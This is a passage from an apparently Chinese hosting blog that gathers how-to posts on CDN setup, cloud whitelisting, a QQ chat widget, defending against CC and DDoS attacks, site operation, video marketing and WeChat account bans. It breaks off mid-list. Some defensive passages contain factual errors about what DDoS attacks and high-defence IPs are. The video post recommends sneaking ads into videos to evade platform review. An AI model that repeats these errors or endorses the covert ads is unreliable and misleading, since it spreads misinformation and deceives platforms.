这种问题其实不知道怎么回答,一般遇到这种问题这边都不回答,不过这样显得很没礼貌,所以主机吧做了个教学给大家,希望可以帮助。 要知道如何开启百度云加速,我们先理清云加速工作原理,云加速其实就是一个中转站,客户访问你域名会访问至云加速节点,云加速节点会请求你服务器再展示内容给客户看。 所以开启百度云加速很简单,只需要在百度云加速里设置域名解析至自己的服务器即可。操作如下,以NS接入为例: 1.添加域名 2.添加子域名 创建,完成下一步,需要注意的是,指向一定要写自己的源服务器IP。 3.修改NS 把域名的DNS服务器修改成百度的DNS即可完成。 至于怎么修改域名DNS每个域名商的界面都不同,这里主机吧就不多说了。如果还是不会的主机吧也没办法了。   #### 如何给网站添加QQ弹出自动会话窗口 主机吧最近一直一家企业做网站,应客户要求,给需要给网站添加一个自动弹出会话的功能。经过一翻收罗后,发现网上很多的都是失效的,根本没法用。找了半天才找到一个比较好用的代码,采用的是JS调用的方法,很实用。这里分享给大家。 网上搜的代码大多是暗藏网址的,主机吧已经把相关网址删除了,大家可以放心使用。 链接: https://pan.baidu.com/s/11Y7B7XiXpJNUAFDZ9YYllg 密码: ep7q 添加方式很简单,把下载的压缩包里的面的文件夹传到根目录上,然后在网页模板</body>前面添加JS调用代码 <script>kfguin="123456789";ws="zhujib.com"; companyname="主机吧"; welcomeword="您好,欢迎光临主机吧<brT>请问,有什么可以帮到您的吗?"; type="1";</script> <script src="js/zhujib.js"></script> <!-- 将123456789修改为你的QQ号码、网页地址、网站名称换成你自己的即可 -->   #### 如何给阿里云ECS云服务器添加IP白名单 阿里云是国内最大的云服务商,主机吧遇到的十个客户里起码有8个是用阿里云的,说阿里云好吧,速度稳定性没得说,说他不好吧,云服务器不支持换IP,防御能力极低,防御产品还贼贵。 所以很多阿里云的客户遇到网站被攻击就会找上主机吧进行防御,问题也自然多,比如最近就经常遇到防御IP被阿里云云盾给误杀屏蔽了,解决办法很简单,给IP加白名单。 阿里云安全拦截主要有两个,一个是安全组,一个是云盾。 我们先来说下安全组添加白名单方法,进入ECS管理 找到相应的实例,右边更多-网络与安全组 点安全组配置 配置规则 添加安全组规则   选入方向,允许,协议一般为HTTPS HTTP,授权对象写IP地址就行   确定后,安全组IP白名单就完成了。   下面我们来设置云盾白名单,点右边的图标,产品与服务,查询安骑士 进入安骑士左下面的安全配置 登陆IP拦截加白点设置 添加 对像类型选:云服务器ECS 源IP:输入你要加白名单的IP  下面选择你要加白名单到哪个ECS服务器上,选点,然后点右图标移至右面,再点确实即可。   完成效果 好了,以上就是如果给阿里云云服务器加白名单的教学了,希望可以帮助大家,欢迎大家多多关注主机吧,我们会一直为你提供更多教学。 #### 如何解决百度云加速七牛云CDN冲突 最近有一位客户向主机吧反馈:接入百度云加速后,子域名使用的七牛云失效了,无法验证七牛CDN,解析的CNAME就失效了。 在了解后我们得知这位客户使用的是DNS接入,也就是域名NS修改到百度云加速这边,添加CNAME解析后,百度云加速默认会给这个子域名进行CDN加速处理,也就是说你在百度云加速添加七牛云解析后,百度云加速会默认给对七牛云的节点进行加速解析,这样就会导致七牛云无法识别出你这个域名是否有进行CNAME解析的情况,自然会失效,CDN与CDN节点是无法叠加访问的。 要解决办法很简单,只要对应的子域名不在百度加速即可。比如我这位客户,在七牛云的加速子域名是cdn.senjieguolv.com,那么我们只需要在百度云加速里添加子域名CDN,CNAME解析对应的七牛云解析如下: 创建完成后,我们再进行编辑: 把状态调为OFF,保存。也就是关掉加速的意思,关掉后,百度云加速只对这个域名进行正常解析处理,而不进行加速处理,这样就可以解决云加速CDN与七牛CDN冲突的问题了,这个子域名只会直接走七牛云的加速,而不会走百度的加速。   #### 如何识别CC攻击 识别CC攻击是保护网站安全的关键步骤。CC攻击是一种常见的网络攻击,它利用伪造的HTTP请求数据包来占用服务器的资源,导致服务器的性能急剧下降,甚至无法正常运行。为了识别CC攻击,我们需要了解其特点及识别方法。 CC攻击的特点 CC攻击的主要特点包括: 请求数据包伪造:攻击者伪造HTTP请求数据包,模拟多个用户访问网站,占用服务器的资源。 攻击流量大:CC攻击会发送大量的伪造请求,占用服务器的资源,导致服务器的性能急剧下降。 攻击来源不确定:CC攻击的请求来源可能来自全球任何一台计算机,难以确定攻击者的真实来源。 如何识别CC攻击 识别CC攻击的方法有多种,以下是几种常见的方法: 查看访问日志:通过查看网站的访问日志,可以发现伪造的HTTP请求数据包。一般情况下,正常的用户访问会有明确的IP地址和请求内容,而CC攻击则会有大量无规律可循的IP地址和请求内容。 分析流量来源:利用网络安全设备,如防火墙、入侵检测系统等,分析网站的流量来源,发现异常的IP地址和请求行为,从而识别CC攻击。 监测服务器性能:通过监测服务器的CPU、内存、带宽等资源使用情况,发现服务器资源被大量占用的情况,从而识别CC攻击。 总结 本文介绍了CC攻击的特点及识别方法。通过查看访问日志、分析流量来源和监测服务器性能等方式,可以有效地识别CC攻击,保障网站的安全和稳定。为了更好地保护网站,建议加强安全意识,定期检查和更新网站的安全设置,以保障用户的隐私和数据安全。 #### 如何识别DDOS攻击的特征 随着网络技术的发展,各种网络攻击层出不穷,其中DDoS攻击是危害最大、最具破坏力的攻击之一。DDoS攻击全称为分布式拒绝服务攻击,其目的是通过向目标服务器发送大量的无效请求或数据包,从而使其无法正常响应真实请求,最终达到让目标服务器瘫痪的目的。为了更好地保护企业和个人的网络财产和数据安全,识别DDoS攻击的特征显得尤为重要。本文将介绍如何识别DDoS攻击的特征。 首先,要了解DDoS攻击的特征,需要对其定义和常见形式有一定的了解。DDoS攻击的常见形式包括但不限于信息泄漏、计算机攻击等。在信息泄漏方面,攻击者会利用各种漏洞和弱点,通过网络监听等手段获取敏感信息,比如用户账号、密码等。在计算机攻击方面,攻击者会通过网络向目标主机发送大量的虚假请求或数据包,使其无法正常响应真实请求。 其次,要识别DDoS攻击的特征,可以通过以下几个方面进行观察: 观察网络流量。DDoS攻击通常会发起大量的无效请求或数据包,导致网络流量异常增长。如果发现某个时间点的网络流量异常增长,尤其是向某个特定IP地址或服务端口发送的大量无效流量,就应该警惕是否存在DDoS攻击的可能性。 观察系统资源占用。DDoS攻击通常会占用大量的系统资源,如CPU、内存等。如果发现某个时间段内系统资源占用率异常高,尤其是某一类协议或服务占用的资源过多,就需要警惕是否存在DDoS攻击的可能性。 观察网络连接状态。DDoS攻击通常会发起大量的无效连接请求,导致连接状态异常。如果发现某个时间段内连接状态异常增长,尤其是某一类连接状态异常增长,就需要警惕是否存在DDoS攻击的可能性。 最后,为了有效防范DDoS攻击,需要采取相应的防范措施。首先,实施网络安全保护,提高警惕性,定期检查系统和网络漏洞,并及时修复。其次,可以通过设置防火墙规则、限制请求频率等方式来减少DDoS攻击的影响。此外,可以使用高防IP、高防CDN等技术手段来抵御DDoS攻击。 总之,识别DDoS攻击的特征对于有效防范DDoS攻击至关重要。企业和个人用户需要重视网络安全,提高警惕性,定期检查系统和网络漏洞,并采取相应的防范措施来保障自身网络财产和数据安全。 #### 如何识别正在被DDOS攻击 DDoS(分布式拒绝服务攻击)是一种网络攻击,攻击者通过控制大量受感染的计算机或设备向目标服务器发送大量的数据流量,以使其过载并无法正常提供服务。以下是一些识别DDoS攻击的方法: 网络速度变慢:当您的网络连接速度突然变慢时,可能是DDoS攻击导致的。攻击者通过占用网络带宽来消耗目标服务器的资源,从而导致其他用户的网络连接受到影响。 网站或应用程序无法访问:如果您尝试访问某个网站或应用程序,但始终无法连接,可能是DDoS攻击导致的。攻击者通过向目标服务器发送大量的请求,使其过载而无法正常响应用户请求。 网络连接中断:在DDoS攻击期间,您可能会发现您的网络连接突然中断或不稳定。这是因为攻击者正在占用网络带宽,导致其他用户的连接受到影响。 延迟增加:当您尝试进行在线游戏、视频通话或其他需要实时通信的活动时,如果出现明显的延迟,可能是DDoS攻击导致的。攻击者通过占用网络带宽来影响目标服务器的响应时间。 要防范DDoS攻击,您可以采取以下措施: 使用DDoS防护服务:许多互联网服务提供商和安全解决方案提供商都提供专门的DDoS防护服务,可以帮助您检测和抵御DDoS攻击。 配置防火墙和入侵检测系统:确保您的网络设备(如路由器、交换机和防火墙)已配置为检测和阻止恶意流量。 限制访问权限:根据实际需求限制对敏感资源的访问权限,以降低被攻击的风险。 定期更新和维护系统:确保您的操作系统、应用程序和安全解决方案保持最新状态,以防止潜在的安全漏洞被利用。 #### 如何购买DDoS高防IP实例 根据您的业务安全需求,选择购买适合的DDoS高防IP实例套餐。 前提条件 购买高防IP服务前,您需完成用户注册。 背景信息 DDoS高防IP实例仅适用于业务服务器部署在中国大陆地域内的DDoS防护场景。如果您需要防护的业务服务器是部署在中国大陆以外的地域,请选择DDoS高防(国际)。 操作步骤 1.登录速度网络DDoS高防IP购买页面。 链接https://www.suduwangluo.com/ip 2.根据您的业务需要选择保底防护带宽、最高防御峰值、使用时长。 3. 选择适合的防护域名数,业务QPS(单位时间并发量),防护端口(四层) 名词解析: 保底防护带宽: 指高防IP实例的保底防护带宽。根据所选择的保底防 护带宽及购买时长,生成预付费账单。 最高防御峰值: 防御峰值即DDOS流量防御峰值,指每秒最大的攻击峰值(非累计攻击流量)。 业务QPS,指单位时间内的并发请求数量,如果并发请求数量大于该值,新来的请求将进行自定义的拦截操作 防护域名数,一个高防ip可以绑定多个不同的域名,在您解析过域名到高防ip后。即可生效 防护端口数,只四层访问(TCP,UDP)请求的绑定端口数 3.选择您需要的套餐后,单击立即购买,进行付费,完成购买流程。 #### 如何运营网站(网站运营详细介绍) 网站运营是指一切为了提升网站服务于用户的效率,而从事与网站后期运作、经营有关的工作1。网站运营的目的是为了吸引和留住用户,提高用户的满意度和忠诚度,从而实现网站的商业价值。网站运营需要制定合理的策略和方案,根据网站的定位、目标、功能和特色,进行内容更新、服务器维护、流程优化、数据分析、用户管理、营销推广等工作。 以下是一个简单的网站运营方案,仅供参考: 第一步:调研与分析 在开始运营一个网站之前,需要先进行市场调研和竞品分析,了解目标用户的需求、痛点、喜好和行为特征,以及同行业或同类型的网站的优势、劣势、特色和模式。通过收集和整理相关数据,找出自己网站的定位和差异化,制定出适合自己网站的发展方向和目标。 第二步:网站策划与建设 根据调研和分析的结果,进行网站的策划和建设,包括网站的结构、功能、设计、内容等方面。网站策划要考虑用户体验和搜索引擎优化(SEO)两个方面,使网站既能满足用户的需求和喜好,又能提高在搜索引擎中的排名和曝光度。网站建设要保证网站的稳定性、安全性、易用性和兼容性,避免出现技术故障或用户投诉。 第三步:运营目标规划 在完成网站策划和建设后,需要制定出具体的运营目标和计划,以及相应的评估指标和方法。运营目标要具有可量化、可实现、可检验的特点,例如增加访问量、提高转化率、扩大用户规模等。运营计划要明确运营的时间、内容、方式、责任人等细节。评估指标要能反映运营效果和问题,例如PV、IP、注册用户、在线用户、跳出率、付费用户等。 第四步:运营策略制定 根据运营目标和计划,制定出具体的运营策略和方法,包括内容运营、社交媒体运营、活动运营、数据运营等。内容运营是指通过更新维护网站上的文字、图片、视频等信息,增加用户的兴趣和粘性。社交媒体运营是指通过利用微博、微信、知乎等平台,扩大网站的影响力和知名度。活动运营是指通过举办各种形式的线上或线下活动, 激励用户的参与和分享。数据运营是指通过收集、分析、挖掘网站的各种数据,优化网站的功能和性能,提升网站的转化率和留存率1。 第五步:策略执行与评估 在制定好运营策略后,需要将其落实到具体的执行层面,分配好各个部门和人员的职责和任务,制定好时间表和预算,监督和协调好各个环节的进展。同时,需要定期对运营效果进行评估和反馈,根据数据和用户反馈,及时调整和优化运营策略,不断改进和创新1。 第六步:持续迭代与创新 网站运营是一个持续的过程,不是一次性的项目。随着市场的变化和用户的需求的变化,网站运营也需要不断地迭代和创新,保持网站的活力和竞争力。需要关注行业的动态和趋势,学习借鉴优秀的案例和经验,不断尝试新的技术和方法,为用户提供更好的服务和体验。 总之,网站运营是一个系统而复杂的工作,需要有清晰的目标、合理的策略、有效的执行、及时的评估、持续的迭代和创新。只有这样,才能让网站成为一个成功的商业平台。 #### 如何进行有效的视频推广 导语:随着移动互联网的蓬勃发展,视频又焕发出新的生机,利用视频进行推广宣传将会越来越受到重视。 今天紫菜头博客从视频推广手段和转化方法两个方面给大家介绍一下视频推广方法。 一、视频推广手段 现在互联网上,利用视频进行推广的手段大致可以分为三类: 1、自媒体模式 这种模式在很早之前就已经兴起,例如早期的叫兽系列视频,敖厂长系列视频,那个时候还不叫自媒体,最多也就是个播客,算是视频自媒体的雏形。随着罗辑思维思维的兴起,掀起了一大股网络视频自媒体。 这种视频自媒体的模式有一个显著特点:内容为王。你必须有自己独特的内容,必须要网友认可你。 正是由于内容为王的特点,这种模式也存在着显著的优势和劣势。 优势:内容新颖独特,可以吸引相对精准的人群,在自然而然中完成了粉丝筛选,为日后的流量转化埋下很好的伏笔。 劣势:要创造好的内容,就需要好的题材,这样会占用很大的人力、物力,前期付出很大。 适用范围:适合团队操作。 2、热门事件模式 这种模式很常见,利用热门的新闻、电影、电视剧来做视频,在很短的时间内收获巨大的流量,不得不说,这是一种快速获得巨大流量的视频推广模式。例如:目前刚刚上映的《万物生长》 可以利用这种热门电影做长尾关键词,收到的效果都是相当好的。 这种模式的特点是:具有时效性。只是在特定的时间具有巨大的效果,流量来的快,走的也快。 热门事件模式也具有一定的优势和劣势。 优势:简单快捷,门槛低。在百度风云榜找到热门关键词,用几张图片很快就能做出一个相关视频,在极短的时间内就能完成推广。 劣势:流量不长久,有效期可能只有几天;流量不精准,后期转化存在弊端。 适用范围:适合个人批量操作。 3、视频外链模式 这种模式是从视频外链演变而来,做网站的朋友是比较熟悉视频外链的,我们暂且不论视频外链是否对网站权重有效果,我们完全可以用这种模式对我们的产品进行网络宣传。比如:我对紫菜头博客做过视频外链宣传。 这种模式并没有对网站产生立竿见影的效果,但是由于所操作的视频网权重较高,在很快的时间内可以使你的关键词获得排名。这种模式的特点就是:简单暴力。 视频外链模式也存在着优势和劣势: 优势:操作简单。只需要上传视频,不用管视频内容是什么,因为我们的推广内容在标题上。 劣势:需要量大。需要大量持续操作,因为这种视频通过率低,而且被删除概率大。 适用范围:适用于个人利用软件批量操作。 PS:这种模式不仅仅限于网站推广,也可以用来推广QQ、微信等等。 二、视频推广转化方法 视频推广方法基本包括以上几种手段,相信大家获得了大量流量以后就开始思考如何将流量进行转化了,现在分析一下具体的转化方法 1、直接转化 直接转化是指直接把我们的推广信息加入到视频中,让网友很明显的看到,达到精准暴力转化的目的。这种转化方法适合于自媒体模式。 例如:罗辑思维视频会在视频中直接插入广告,推广自己的微信账号。 这种方法的特点就是:转化的粉丝非常精准,比较容易产生价值。 2、间接转化 间接转化是指并不明目张胆的把我们的推广信息打出来,而是偷偷摸摸在视频中插入与视频不相关的推广信息。这种转化方法常见于热门事件模式和视频外链模式。 例如:利用热门视频转化时,可以在自己的视频中间里插入自己的广告,这样需要的人自然会加入你的联系方式,帮你完成粉丝筛选。 这种转化方法的特点是:形式较为隐蔽,可以避开视频网站的审核,但是转化率较低。 结束语: 视频推广手段和方法并不是固定不变的,你可以根据自己的需要将这些方法进行综合使用,这样收到的效果也会翻倍。 #### 如何避免微信被封 微信作为用用户量最大的社交软件,有着其他软件无可撼动的地位,和盟友QQ更加年轻化用户群体不同的是,微信的用户占据了各个年龄段,几乎每个人的手机里都有微信。不过,随着微信用户量的不断增加,不良行为也越加肆无忌惮。因此,微信官方团队表示:凡是存在可疑行为的账号,微信平台都将对其进行查处,目前已经有大量用户被封号。 一 ,频繁加好友微信庞大的用户群体,让一些做营销的人找到了商机,微商可谓是搜到了很多年轻人的青睐,不断有陌生人添加好友,打开朋友圈多半都是营销广告,这种行为受到了微信的重视,加好友受到限制,发朋友圈受到限制。严重者直接给与封号处理 解决办法:不要去盲目的添加好友,精准锁定自己的客户群体,确保每加上一个好友就是自己的目标客户,这样就能很大程度避免频繁添加好友违规行为的出现,也能省去一大部分筛选的时间。想要做到精准定位,需要根据自己产品去添加目标客户。 二 ,使用第三方软件,智能手机的普及也让微信快速走进人们的生活和工作。很多人都会有两个微信号甚至更多,一个生活用,剩余的都是工作中用,这么多微信想在一个手机上登录就必须用到微信分身,这种软件被腾讯视为第三方软件,被检测到之后会直接封号。 三,发钓鱼网站链接,像文章开头提到的,如果你在微信中发送钓鱼网站的链接,肯定是要被封号的。有些用户看到类似分享就可以领红包的链接,主动转发给好友,也可能中招。要知道,现在大部分人的微信都绑定了银行卡,钱财安全很难保障。因此,大家在使用微信时一定不要主动或被动转发这些链接。 总结:这个世界唯一不变的就是“变”,时代在变,环境在变,传统的经营理念已经无法满足现代人的需求,我们需要顺应时代的改变才不会被社会淘汰,希望小编今天的分享能够给大家带来帮助! 作者:熊猫竹子006 #### 如何避免成为DDOS攻击的目标? 随着互联网的普及,网络攻击也日益猖獗。其中,DDoS(分布式拒绝服务)攻击是一种常见的网络攻击方式,它通过利用大量计算机系统同时向目标服务器发送请求,使其无法正常提供服务,从而达到攻击目的。如果一个网站、应用程序或服务器成为DDoS攻击的目标,那么它将面临瘫痪的风险,甚至可能导致业务中断、用户流失等问题。因此,如何避免成为DDoS攻击的目标成为了企业和个人必须面对的问题。 以下是一些避免成为DDoS攻击目标的方法: 使用CDN(内容分发网络) CDN可以将网站的内容分发到全球各地的服务器上,从而减轻单个服务器的压力,提高网站的可用性。此外,CDN还可以提供缓存功能,加速网站的响应速度。使用CDN可以有效地分散攻击流量,降低被攻击的风险。 配置防火墙 防火墙可以过滤掉恶意流量,阻止攻击者进入您的网络。确保您的防火墙能够识别和阻止DDoS攻击。此外,您还可以使用入侵检测系统(IDS)和入侵防御系统(IPS)等工具来监测网络流量,及时发现异常流量并采取相应的措施。 加强身份验证 使用强密码和多因素身份验证可以防止攻击者使用暴力破解等方式入侵您的系统。此外,还可以使用单点登录(SSO)等技术来简化用户的登录过程,减少被攻击的风险。 限制带宽 通过限制每个IP地址或IP地址段的带宽使用量,可以有效地控制DDoS攻击的影响。可以使用硬件负载均衡器、软件负载均衡器或防火墙等设备来实现带宽限制。此外,您还可以与您的网络服务提供商合作,让他们帮助您限制带宽。 建立紧急响应计划 建立紧急响应计划可以帮助您在DDoS攻击发生时迅速做出反应。计划中应包括哪些团队负责什么任务、如何通知用户、如何备份数据等内容。此外,您还应该定期进行演练,以确保您的团队能够快速、有效地应对DDoS攻击。 需要注意的是,DDoS攻击是一种复杂的攻击方式,没有一种单一的方法可以完全防止其发生。因此,建议采用多种方法结合使用,以提高抵御DDoS攻击的能力。 #### 如何防止CC攻击 随着互联网的普及,网络安全问题日益引起人们的关注。其中,CC攻击是一种常见的网络攻击方式,它会对企业和个人网站造成严重的危害。为了防止CC攻击,我们可以采取多种措施,包括高防服务器、高防IP和高防CDN等。本文将详细介绍这些措施及其应用。 高防服务器 高防服务器指的是具备较高防御能力的服务器,它可以有效抵御各种网络攻击,包括CC攻击。在选择高防服务器时,我们可以考虑以下几个方面: 安全性:选择有信誉和较强技术实力的云服务商,例如阿里云、腾讯云等。这些服务商会对服务器进行全方位的安全防护,包括防火墙、入侵检测和防御等。 硬件配置:选择配置较高的服务器,例如CPU、内存和带宽等。这些硬件配置可以提高服务器的防御能力和性能。 网络拓扑结构:选择合适的网络拓扑结构,例如网格结构、星形结构等,可以减少服务器之间的相互影响,提高防御能力。 高防IP 高防IP是指通过封堵IP地址来防御CC攻击。当网站遭受CC攻击时,可以采取以下措施: 静态封堵:将恶意IP地址添加到防火墙的禁止访问列表中。 动态封堵:通过检测和识别恶意流量,将恶意IP地址加入禁止访问列表中。 IP信誉库:通过查询IP信誉库,获取IP地址的信誉度,从而识别恶意流量。 高防CDN 高防CDN可以通过缓存技术来减轻网站遭受CC攻击的压力。高防CDN可以自动将用户请求转发到最近的缓存节点,从而实现快速响应。当网站遭受CC攻击时,高防CDN可以通过以下方式来增强网站的安全性: 流量清洗:通过清洗恶意流量,减轻对源站的冲击。 负载均衡:将请求分散到多个节点,减轻单个节点的负载压力。 DDoS防御:通过抵御分布式拒绝服务攻击,保护网站的正常运行。 总结 本文介绍了防止CC攻击的三种措施:高防服务器、高防IP和高防CDN。这些措施都可以不同程度地增强网站的安全性,但它们在使用时也需要注意一些细节和注意事项。例如,在使用高防CDN时,需要注意节点选择和缓存策略等问题;在使用高防IP时,需要注意合法性和误封等问题。总之,防止CC攻击需要综合考虑多种因素,包括技术、服务、成本等,只有全面、科学地防御才能有效地保护网站的安全。未来随着技术的不断进步和发展,防止CC攻击的方式和方法也将不断升级和优化。 #### 如何防止DDOS攻击 防止DDOS攻击的方法有以下几个方面: 过滤所有RFC1918 IP地址,RFC1918 IP地址是内部网的IP地址,像10.0.0.0、192.168.0.0 和172.16.0.0,它们不是某个网段的固定的IP地址,而是Internet内部保留的区域性IP地址,应该把它们过滤掉。此方法并不是过滤内部员工的访问,而是将攻击时伪造的大量虚假内部IP过滤,这样也可以减轻DDoS的攻击。 用足够的机器承受黑客攻击,这是一种较为理想的应对策略。 充分利用网络设备保护网络资源,所谓网络设备是指路由器、防火墙等负载均衡设备,它们可将网络有效地保护起来。当网络被攻击时最先死掉的是路由器,但其他机器没有死。特别是一个公司使用了负载均衡设备,这样当一台路由器被攻击死机时,另一台将马上工作。从而最大程度的削减了DDoS的攻击。 在骨干节点配置防火墙,防火墙本身能抵御DDoS攻击和其他一些攻击。 其他防御手段,如使用品牌服务器设备、高带宽、升级源站配置、网页伪静态、安装防火墙、定期备份网站数据、套用高防cdn等。 总之,防止DDOS攻击是一项复杂的任务,需要多方面的措施和防御策略。需要注意的是,不同攻击方法有所不同,因此相应的防御方法也会有所不同,需要根据具体情况采取相应的措施。 #### 如何防止DDOS攻击和CC攻击 随着互联网的普及和发展,网络安全问题日益突出,其中DDoS攻击和CC攻击是两种最常见的网络攻击。为了保护企业和个人的网络财产和数据安全,防止DDoS攻击和CC攻击显得尤为重要。本文将介绍如何防止DDoS攻击和CC攻击,以及如何利用现有的技术手段来抵御这些攻击。 首先,为了防止DDoS攻击和CC攻击,我们需要了解它们的常见手段和危害性。DDoS攻击的目的是通过向目标服务器发送大量的无效请求或数据包,从而使其无法正常响应真实请求。而CC攻击则是通过模拟用户行为,向目标服务器发送大量虚假请求,从而消耗服务器的资源,使其无法正常响应真实请求。 其次,我们需要采取相应的预防措施来抵御DDoS攻击和CC攻击。对于DDoS攻击,我们可以采取以下预防措施: 升级网络带宽和服务器配置,提高服务器的处理能力和响应速度; 使用高防IP或高防CDN等服务,将攻击流量引导至安全节点,从而保护源站的安全; 定期检查系统和网络漏洞,并及时修复。 对于CC攻击,我们可以采取以下预防措施: 识别用户行为,通过设置验证码等方式,识别并过滤掉模拟用户行为的请求; 设置防护设备,如防火墙等,对异常流量进行过滤和处理; 对用户访问频率进行限制,避免同一用户多次访问。 最后,我们来看一个实际的案例,说明如何利用上述措施成功防范DDoS攻击和CC攻击。某企业在遭受DDoS攻击时,采取了以下措施:首先,升级了网络带宽和服务器配置,提高了服务器的处理能力和响应速度;其次,使用了高防IP服务,将攻击流量引导至安全节点,从而保护源站的安全;最后,定期检查系统和网络漏洞,并及时修复。通过这些措施的采取,该企业成功地抵御了DDoS攻击。而一个博客平台在遭受CC攻击时,采取了以下措施:首先,识别用户行为,通过设置验证码等方式,过滤掉模拟用户行为的请求;其次,设置了防护设备,如防火墙等,对异常流量进行过滤和处理;最后,对用户访问频率进行限制,避免同一用户多次访问。通过这些措施的采取,该博客平台成功地抵御了CC攻击。 总结起来,防止DDoS攻击和CC攻击需要从多个方面入手,包括提高服务器配置、使用高防IP或高防CDN、定期检查系统和网络漏洞等措施。同时,需要密切关注网络安全动态,及时采取最新的技术手段来抵御各种网络攻击。只有通过这些措施的实施,才能有效地保护企业和个人的网络财产和数据安全。 #### 如何防止网站被攻击?平时该做些什么? 网站攻击是互联网最具威胁性也是最具破坏性的行为。全球有70%的网站都有被攻击过,中国更是恐怖,达到80%,也就是十个网站有八个被攻击过。做好网站安全防护是每个网站运维、站长必须学会的技能。今天主机吧教大家如何防止网站被攻击。一:服务器配置安全1、基本配置宽带内存CPU等配置必须尽量大,不要求很高配置,但起码不能是1核1M这种,不管什么样防护系统,肯定多多少少都会有一些遗漏的攻击,而你服务器连这些遗漏的攻击都顶不住,再好的防护系统有什么用呢?所以我们尽量提升下服务器配置。2.服务器权限设置对于虚拟主机的用户,一般不用去操心这些,但是对于一些VPS或者云服务器的用户更需要做好这些,包括端口的设置、防火墙的设置,以及上传权限的设置,都是需要格外注意的。 如果这些程序是要执行的,那么设置权限为“纯脚本”,不要设置“写入”和“脚本资源访问”,更不要设置为:“纯脚本和可执行程序”。否则如exe类型的可执行程序,同时拥有写入权限的话,那么就很容易被人上传木马程序了! 对于IIS配置方面,如果不是很在行的人,而网站又经常的被人上传、篡改,建议可以申请专人对其进行一次配置,这样会更好!也可以安装像安全狗这样的防护软件进行防护。 二:隐藏真实IP地址 为什么许多大型的网站都做了CDN加速,真的是为了让用户访问更快速吗?其实这个速度基本上是看不出来的。但是其主要目的是:抗攻击,用均衡负载的方式来减少独立影响,不过价格往往偏高,不是中小网站所可以选择的。 但是近两年流行出来的如:百度云加速却完全打破了防护价格高的局面,集安全、防护、搜索引擎优化一体,具备1Tbps的压制能力的抗D中心,拥有自有DDoS/CC清洗算法,可有效帮助网站防御SYN Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Proxy Flood、CC等常见的洪水攻击。从而彻底解决了中小型网站在面对DDoS攻击时预算不足的尴尬,也为所有防护网站的稳定运行提供保障。 三:做网站程序的选择 有些程序天生就是被人来攻击的,比如“织梦”系统就属于漏洞较多的一种,不知道每天会被多少人扫。网站建设,建议选择一些更为成熟的网站程序来做,尽量不要使用一些“偏门”的程序,或者一时开发但又失去维护的程序。 对于目前建站主流程序,我们这里推荐的是:帝国cms、discuz、wordpress ,当然还有一些是更为系统类型的,我们这里无法将所有不同分类的系统都列出来:尽量选择一些知名的,做开发年代多,又一直在更新的系统来使用吧!不要去找什么破解版,天上真的不会掉馅饼! 四:网站要使用独立IP 优秀的网站都会去使用独立IP,而不是去使用共享IP,同IP下的网站越多,那么潜在风险就是越大的!独立IP的网站相对来说,整体的网站类型也更优秀,没多少人天天拿独立IP去做垃圾站的不是吗?所以很大的程度上,规避了“相同IP”被攻击的问题。好了,总得来说做网站安全防护主要从服务器、网站程序、安全拦截系统三方面下手。做到以上说的几点,基本可以解决互联网上的999.9%的攻击。 #### 如何防止针对Web服务器的CC攻击 随着互联网的普及,针对Web服务器的CC攻击已经成为一种非常常见的网络攻击方式。这种攻击会伪造请求,占用服务器的资源,导致服务器的性能急剧下降,甚至无法正常运行。为了防止针对Web服务器的CC攻击,我们可以采取以下几种措施: 过滤请求头 攻击者常常通过伪造请求头来实施CC攻击。因此,过滤请求头是一种非常有效的防止CC攻击的方法。过滤请求头可以避免攻击者利用请求头进行攻击,同时也可以减少服务器的资源消耗。 增加缓存大小 增加缓存大小可以减少服务器需要处理的请求数量,从而减轻服务器的负担。另外,通过缓存静态文件,如图片、CSS文件等,可以减少服务器需要处理的请求数量,从而提高服务器的响应速度。 使用安全认证 通过使用HTTPS协议和安全认证,可以避免网站被恶意攻击者篡改和伪造。同时,还可以保护用户隐私和数据安全。 控制访问速度 攻击者常常利用多线程技术进行CC攻击。因此,通过控制访问速度,可以限制单个IP地址的请求频率,从而避免服务器被过度占用。 配置防火墙 配置防火墙可以有效地阻止CC攻击。通过设置过滤规则,可以过滤掉未经授权的IP地址和请求,从而保护服务器的安全。 总之,防止针对Web服务器的CC攻击需要多种措施的综合应用。通过过滤请求头、增加缓存大小、使用安全认证、控制访问速度以及配置防火墙等方式,可以有效防御CC攻击,保护服务器的安全和稳定。 #### 如何防范针对网站的CC攻击 了解CC攻击的定义和常见形式 CC攻击是一种分布式拒绝服务(DDoS)攻击方式,其主要形式是利用多个恶意客户端反复请求网站服务器,从而耗尽服务器资源和带宽等,导致服务器无法正常响应合法用户的请求。CC攻击以其高发性、难以追踪和难以防范等特点,成为目前最为危险的网络安全威胁之一。 分析CC攻击的成因和影响 CC攻击之所以如此危险,主要是因为其可以利用大量的“肉机”进行攻击,而且攻击请求可以伪造成合法用户的行为,使得服务器难以辨别和处理异常请求。CC攻击的影响范围非常广泛,不仅会导致网站服务器崩溃,还可能导致网站服务不可用、数据泄露等严重后果。 介绍如何防范针对网站的CC攻击 为了防范CC攻击,我们可以采取以下几种措施: 定期更新和打补丁:及时更新系统和软件补丁,修复已知的安全漏洞。 限制同一IP的访问频率:限制同一IP地址的访问频率,防止恶意用户通过频繁请求耗尽服务器资源。 运用CDN服务:使用CDN服务可以有效地减轻CC攻击的影响,因为CDN服务商的节点服务器可以分担部分请求流量。 配置防火墙:在服务器上配置防火墙,过滤掉异常请求流量。 监控和分析网络流量:时刻监控网站的网络流量,发现异常流量及时采取措施应对。 提供实用性建议 为了更好地防范CC攻击,我们可以从以下几个方面入手: 加强网络安全意识:网站管理员和运营者应时刻关注网络安全动态,随时调整和完善安全策略。 选择可靠的安全服务供应商:选择专业的安全服务供应商,获取专业的安全防护建议和服务。 定期备份重要数据:以防不测发生时能够快速恢复网站服务。 总结 本文简单介绍了CC攻击的定义和常见形式、成因和影响,以及如何防范针对网站的CC攻击。针对CC攻击的防范是一个不断更新和完善的过程,需要网站管理员和运营者时刻关注网络安全动态,采取有效的措施应对网络安全威胁。希望本文提供的实用性建议能够帮助大家更好地保护自己的网站安全。 #### 如何阻止Censys扫描服务器IP Censys是一个开源的互联网扫描服务,它可以扫描互联网上的设备,收集设备信息并将其存储在数据库中。虽然Censys的目的是为了促进互联网的发展和安全,但有时候某些人可能会滥用这个服务来扫描和收集不必要的信息。 如果你想阻止Censys扫描你的服务器IP,可以采取以下措施: 1.使用防火墙阻止IP扫描:在你的服务器上配置防火墙规则,阻止Censys的IP地址访问你的服务器。你可以在Censys的官方网站上找到它们的IP地址列表。 